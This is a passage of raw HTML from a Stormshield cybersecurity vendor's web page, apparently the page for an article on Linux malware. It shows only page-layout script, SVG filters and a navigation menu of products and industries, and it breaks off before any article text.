						var m = pw>(e.gw[ix]+e.tabw+e.thumbw) ? 1 : (pw-(e.tabw+e.thumbw)) / (e.gw[ix]);
						newh =  (e.gh[ix] * m) + (e.tabh + e.thumbh);
					}
					var el = document.getElementById(e.c);
					if (el!==null && el) el.style.height = newh+"px";
					el = document.getElementById(e.c+"_wrapper");
					if (el!==null && el) {
						el.style.height = newh+"px";
						el.style.display = "block";
					}
				} catch(e){
					console.log("Failure at Presize of Slider:" + e)
				}
			//});
		  };</script>
<noscript><style> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><noscript><style id="rocket-lazyload-nojs-css">.rll-youtube-player, [data-lazy-src]{display:none !important;}</style></noscript></head>

<body class="post-template-default single single-post postid-351069 single-format-standard bridge-core-3.0.6 lang-en  qode_grid_1300 qode-child-theme-ver-1.2.4 qode-theme-ver-29.3 qode-theme-bridge qode_header_in_grid qode-wpml-enabled wpb-js-composer js-comp-ver-6.10.0 vc_responsive" itemscope itemtype="http://schema.org/WebPage">


<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-dark-grayscale"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 0.49803921568627" /><feFuncG type="table" tableValues="0 0.49803921568627" /><feFuncB type="table" tableValues="0 0.49803921568627" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-grayscale"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 1" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0 1" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-purple-yellow"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.54901960784314 0.98823529411765" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0.71764705882353 0.25490196078431" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-blue-red"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 1" /><feFuncG type="table" tableValues="0 0.27843137254902" /><feFuncB type="table" tableValues="0.5921568627451 0.27843137254902" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-midnight"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 0" /><feFuncG type="table" tableValues="0 0.64705882352941" /><feFuncB type="table" tableValues="0 1" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-magenta-yellow"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.78039215686275 1" /><feFuncG type="table" tableValues="0 0.94901960784314" /><feFuncB type="table" tableValues="0.35294117647059 0.47058823529412" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-purple-green"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.65098039215686 0.40392156862745" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0.44705882352941 0.4" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-blue-orange"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.098039215686275 1" /><feFuncG type="table" tableValues="0 0.66274509803922" /><feFuncB type="table" tableValues="0.84705882352941 0.41960784313725" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg>

<div class="wrapper">
	<div class="wrapper_inner">

    
	<header class=" has_top scroll_header_top_area  fixed scrolled_not_transparent with_border page_header">
	<div class="header_inner clearfix">
		<form role="search" id="searchform" action="https://www.stormshield.com/" class="qode_search_form" method="get">
        <div class="container">
        <div class="container_inner clearfix">
            
            <i class="qode_icon_font_awesome fa fa-search qode_icon_in_search" ></i>            <input type="text" placeholder="Search" name="s" class="qode_search_field" autocomplete="off" />
            <input type="submit" value="Search" />

            <div class="qode_search_close">
                <a href="#">
                    <i class="qode_icon_font_awesome fa fa-times qode_icon_in_search" ></i>                </a>
            </div>
                    </div>
    </div>
</form>
		<div class="header_top_bottom_holder">
				<div class="header_top clearfix" style='background-color:rgba(255, 255, 255, 1);' >
				<div class="container">
			<div class="container_inner clearfix">
														<div class="left">
						<div class="inner">
													</div>
					</div>
					<div class="right">
						<div class="inner">
							<div class="header-widget widget_nav_menu header-right-widget"><div class="menu-headertop_helpmefind-container"><ul id="menu-headertop_helpmefind" class="menu"><li id="menu-item-238811" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-238811"><a href="https://www.stormshield.com/about-us/"><span>About </span>Stormshield</a>
<ul class="sub-menu">
	<li id="menu-item-238813" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-238813"><a href="https://www.stormshield.com/about-us/the-european-cybersecurity-choice/">The European cybersecurity choice</a></li>
	<li id="menu-item-238814" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-238814"><a href="https://www.stormshield.com/about-us/">Our staff</a></li>
	<li id="menu-item-238815" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-238815"><a href="https://www.stormshield.com/about-us/the-stormshield-technology-partner-ecosystem/">Our ecosystem</a></li>
	<li id="menu-item-238816" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-238816"><a href="https://www.stormshield.com/about-us/stormshield-and-cybersecurity/">Our history</a></li>
	<li id="menu-item-238817" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-238817"><a href="https://www.stormshield.com/about-us/our-sales-offices/">Our sales offices</a></li>
	<li id="menu-item-238818" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-238818"><a href="https://www.stormshield.com/about-us/recycling/">Our environmental approach</a></li>
</ul>
</li>
</ul></div></div><div class="header-widget widget_nav_menu header-right-widget"><div class="menu-headertop_contact-container"><ul id="menu-headertop_contact" class="menu"><li id="menu-item-238807" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-238807"><a href="https://www.stormshield.com/join-us/">Join us</a></li>
<li id="menu-item-10384" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10384"><a href="https://www.stormshield.com/contact/"><i class="fa fa-envelope-o" aria-hidden="true"></i> <span>Contact</span></a></li>
</ul></div></div><div class="header-widget widget_icl_lang_sel_widget header-right-widget">
<div
	 class="wpml-ls-sidebars-header_right wpml-ls wpml-ls-legacy-dropdown js-wpml-ls-legacy-dropdown" id="lang_sel">
	<ul>

		<li tabindex="0" class="wpml-ls-slot-header_right wpml-ls-item wpml-ls-item-en wpml-ls-current-language wpml-ls-first-item wpml-ls-item-legacy-dropdown">
			<a href="#" class="js-wpml-ls-item-toggle wpml-ls-item-toggle lang_sel_sel icl-en">
                <span class="wpml-ls-native icl_lang_sel_native">En</span></a>

			<ul class="wpml-ls-sub-menu">
				
					<li class="icl-fr wpml-ls-slot-header_right wpml-ls-item wpml-ls-item-fr wpml-ls-last-item">
						<a href="https://www.stormshield.com/fr/actus/orbit-analyse-malware-linux/" class="wpml-ls-link">
                            <span class="wpml-ls-native icl_lang_sel_native" lang="fr">Fr</span></a>
					</li>

							</ul>

		</li>

	</ul>
</div>
</div>						</div>
					</div>
													</div>
		</div>
		</div>

			<div class="header_bottom clearfix" style=' background-color:rgba(255, 255, 255, 1);' >
								<div class="container">
					<div class="container_inner clearfix">
																				<div class="header_inner_left">
																	<div class="mobile_menu_button">
		<span>
			<i class="qode_icon_font_awesome fa fa-bars " ></i>		</span>
	</div>
								<div class="logo_wrapper" >
	<div class="q_logo">
        <h1>
            <a itemprop="url" href="https://www.stormshield.com/" >
                 <img itemprop="image" class="normal" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E" alt="Stormshield" title="Stormshield" data-lazy-src="https://www.stormshield.com/wp-content/uploads/2016/05/stormshield_logo.png"/><noscript><img itemprop="image" class="normal" src="https://www.stormshield.com/wp-content/uploads/2016/05/stormshield_logo.png" alt="Stormshield" title="Stormshield"/></noscript>                  <img itemprop="image" class="light" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E" alt="Stormshield" title="Stormshield" data-lazy-src="https://www.stormshield.com/wp-content/uploads/2016/05/stormshield_logo.png"/><noscript><img itemprop="image" class="light" src="https://www.stormshield.com/wp-content/uploads/2016/05/stormshield_logo.png" alt="Stormshield" title="Stormshield"/></noscript>                  <img itemprop="image" class="dark" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E" alt="Stormshield" title="Stormshield" data-lazy-src="https://www.stormshield.com/wp-content/uploads/2016/05/stormshield_logo.png"/><noscript><img itemprop="image" class="dark" src="https://www.stormshield.com/wp-content/uploads/2016/05/stormshield_logo.png" alt="Stormshield" title="Stormshield"/></noscript>                  <img itemprop="image" class="sticky" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E" alt="Stormshield" title="Stormshield" data-lazy-src="https://www.stormshield.com/wp-content/uploads/2016/05/stormshield_logo.png"/><noscript><img itemprop="image" class="sticky" src="https://www.stormshield.com/wp-content/uploads/2016/05/stormshield_logo.png" alt="Stormshield" title="Stormshield"/></noscript>                  <img itemprop="image" class="mobile" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E" alt="Stormshield" title="Stormshield" data-lazy-src="https://www.stormshield.com/wp-content/uploads/2016/05/stormshield_logo.png"/><noscript><img itemprop="image" class="mobile" src="https://www.stormshield.com/wp-content/uploads/2016/05/stormshield_logo.png" alt="Stormshield" title="Stormshield"/></noscript>                             </a>
        </h1>
	</div>
	</div>															</div>
															<div class="header_inner_right">
									<div class="side_menu_button_wrapper right">
																														<div class="side_menu_button">
												<a class="search_button search_slides_from_window_top large" href="javascript:void(0)">
		<i class="qode_icon_font_awesome fa fa-search " ></i>	</a>

																							
										</div>
									</div>
								</div>
							
							
							<nav class="main_menu drop_down right">
								
<!-- UberMenu [Configuration:main] [Theme Loc:top-navigation] [Integration:auto] -->
<a class="ubermenu-responsive-toggle ubermenu-responsive-toggle-main ubermenu-skin-white ubermenu-loc-top-navigation ubermenu-responsive-toggle-content-align-left ubermenu-responsive-toggle-align-full " tabindex="0" data-ubermenu-target="ubermenu-main-5-top-navigation-2"  ><i class="fas fa-bars" ></i>Menu</a><nav id="ubermenu-main-5-top-navigation-2" class="ubermenu ubermenu-nojs ubermenu-main ubermenu-menu-5 ubermenu-loc-top-navigation ubermenu-responsive ubermenu-responsive-default ubermenu-responsive-collapse ubermenu-horizontal ubermenu-transition-shift ubermenu-trigger-hover_intent ubermenu-skin-white  ubermenu-bar-align-full ubermenu-items-align-left ubermenu-bound ubermenu-disable-submenu-scroll ubermenu-sub-indicators ubermenu-retractors-responsive ubermenu-submenu-indicator-closes"><ul id="ubermenu-nav-main-5-top-navigation" class="ubermenu-nav" data-title="menu_principal"><li id="menu-item-238871" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-238871 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/what-differentiates-us/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Our difference</span></a></li><li id="menu-item-45" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-45 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-mega" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Our solutions &#038; products</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul  class="ubermenu-submenu ubermenu-submenu-id-45 ubermenu-submenu-type-auto ubermenu-submenu-type-mega ubermenu-submenu-drop ubermenu-submenu-align-full_width"  ><!-- begin Tabs: [Tabs] 22834 --><li id="menu-item-22834" class="ubermenu-item ubermenu-tabs ubermenu-item-22834 ubermenu-item-level-1 ubermenu-column ubermenu-column-full ubermenu-tab-layout-left ubermenu-tabs-show-default ubermenu-tabs-show-current"><ul  class="ubermenu-tabs-group ubermenu-tabs-group--trigger-mouseover ubermenu-column ubermenu-column-1-4 ubermenu-submenu ubermenu-submenu-id-22834 ubermenu-submenu-type-auto ubermenu-submenu-type-tabs-group"  ><li id="menu-item-233334" class="ubermenu-tab ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-233334 ubermenu-item-header ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/tailored-to-your-needs/"><span class="ubermenu-target-title ubermenu-target-text">Tailored to your needs</span></a></li><li id="menu-item-135" class="ubermenu-tab ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-135 ubermenu-item-header ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/"><span class="ubermenu-target-title ubermenu-target-text">By industry</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul  class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-135 ubermenu-submenu-type-tab-content-panel"  ><li class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-item-has-children ubermenu-item-23005 ubermenu-item-level-3 ubermenu-column ubermenu-column-1-2 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-23005"><ul  class="ubermenu-submenu ubermenu-submenu-id-23005 ubermenu-submenu-type-stack"  ><li id="menu-item-233019" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-233019 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/aviation/"><span class="ubermenu-target-title ubermenu-target-text">Aviation</span></a></li><li id="menu-item-143" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-143 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/public-administration-and-government/"><span class="ubermenu-target-title ubermenu-target-text">Public Administration and Government</span></a></li><li id="menu-item-233023" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-233023 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/critical-communication/"><span class="ubermenu-target-title ubermenu-target-text">Critical communication</span></a></li><li id="menu-item-140" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-140 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/defense-and-military-organizations/"><span class="ubermenu-target-title ubermenu-target-text">Defense and Military Organizations</span></a></li><li id="menu-item-233024" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-233024 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/water-industry/"><span class="ubermenu-target-title ubermenu-target-text">Water Industry</span></a></li><li id="menu-item-233022" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-233022 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/facility-management-warehouse/"><span class="ubermenu-target-title ubermenu-target-text">Facility Management &#038; Warehouse</span></a></li></ul></li><li class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-item-has-children ubermenu-item-23006 ubermenu-item-level-3 ubermenu-column ubermenu-column-1-2 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-23006"><ul  class="ubermenu-submenu ubermenu-submenu-id-23006 ubermenu-submenu-type-stack"  ><li id="menu-item-233025" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-233025 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/electric-utilities/"><span class="ubermenu-target-title ubermenu-target-text">Electric utilities</span></a></li><li id="menu-item-233020" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-233020 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/navy/"><span class="ubermenu-target-title ubermenu-target-text">Navy</span></a></li><li id="menu-item-137" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-137 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/health-and-healthcare-facilities/"><span class="ubermenu-target-title ubermenu-target-text">Health and Healthcare Facilities</span></a></li><li id="menu-item-233021" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-233021 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/land-transport/"><span class="ubermenu-target-title ubermenu-target-text">Land transport</span></a></li><li id="menu-item-136" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-136 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/mssps-and-other-service-providers/"><span class="ubermenu-target-title ubermenu-target-text">MSSPs and Other Service Providers</span></a></li></ul></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fas fa-times"></i> Close</li></ul></li><li id="menu-item-238959" class="ubermenu-tab ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-238959 ubermenu-item-header ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/"><span class="ubermenu-target-title ubermenu-target-text">All our products</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul  class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-238959 ubermenu-submenu-type-tab-content-panel"  ><!-- begin Segment: Menu ID 2008 --><li id="menu-item-22456" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-22456 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-3 ubermenu-column ubermenu-column-1-2 ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-icon_left" href="https://www.stormshield.com/products-services/products/network-security/"><span class="ubermenu-target-title ubermenu-target-text">Network security</span></a><ul  class="ubermenu-submenu ubermenu-submenu-id-22456 ubermenu-submenu-type-auto ubermenu-submenu-type-stack ubermenu-autoclear"  ><li id="menu-item-232406" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232406 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/network-security/product-range-sns/"><span class="ubermenu-target-title ubermenu-target-text">Hardware firewalls</span></a></li><li id="menu-item-278814" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-278814 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/network-security/product-range-sns/elastic-virtual-appliances/"><span class="ubermenu-target-title ubermenu-target-text">Virtual Appliances</span></a></li><li id="menu-item-364659" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-364659 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/network-security/administration-tools-sns-firewalls/"><span class="ubermenu-target-title ubermenu-target-text">Administration tools</span></a></li><li id="menu-item-364666" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-364666 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/network-security/our-features-sns/vpn-client/"><span class="ubermenu-target-title ubermenu-target-text">VPN Client</span></a></li><li id="menu-item-232404" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232404 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/network-security/our-features-sns/"><span class="ubermenu-target-title ubermenu-target-text">Features</span></a></li><li id="menu-item-232407" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232407 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/network-security/firewall-comparison/"><span class="ubermenu-target-title ubermenu-target-text">Firewall comparison</span></a></li></ul></li><!-- end Segment: 2008 --><!-- begin Segment: Menu ID 2013 --><li id="menu-item-232477" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-232477 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-3 ubermenu-column ubermenu-column-1-2 ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-icon_left" href="https://www.stormshield.com/products-services/products/endpoint-protection/"><span class="ubermenu-target-title ubermenu-target-text">Endpoint security</span></a><ul  class="ubermenu-submenu ubermenu-submenu-id-232477 ubermenu-submenu-type-auto ubermenu-submenu-type-stack"  ><li id="menu-item-232475" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232475 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/endpoint-protection/terminals-security/"><span class="ubermenu-target-title ubermenu-target-text">Protection for terminals</span></a></li><li id="menu-item-232476" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232476 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/endpoint-protection/server-security/"><span class="ubermenu-target-title ubermenu-target-text">Protection for servers</span></a></li></ul></li><!-- end Segment: 2013 --><!-- begin Segment: Menu ID 2012 --><li id="menu-item-232145" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-232145 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-3 ubermenu-column ubermenu-column-1-2 ubermenu-clear-row ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-icon_left" href="https://www.stormshield.com/products-services/products/data-protection/"><span class="ubermenu-target-title ubermenu-target-text">Data security</span></a><ul  class="ubermenu-submenu ubermenu-submenu-id-232145 ubermenu-submenu-type-auto ubermenu-submenu-type-stack"  ><li id="menu-item-316125" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-316125 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/data-protection/data-encryption-in-google-workspace/"><span class="ubermenu-target-title ubermenu-target-text">Data encryption in Google Workspace</span></a></li><li id="menu-item-316126" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-316126 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/data-protection/data-encryption-in-gmail/"><span class="ubermenu-target-title ubermenu-target-text">Data encryption in Gmail</span></a></li><li id="menu-item-316127" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-316127 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/data-protection/data-encryption-in-outlook/"><span class="ubermenu-target-title ubermenu-target-text">Data encryption in Outlook</span></a></li><li id="menu-item-316128" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-316128 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column 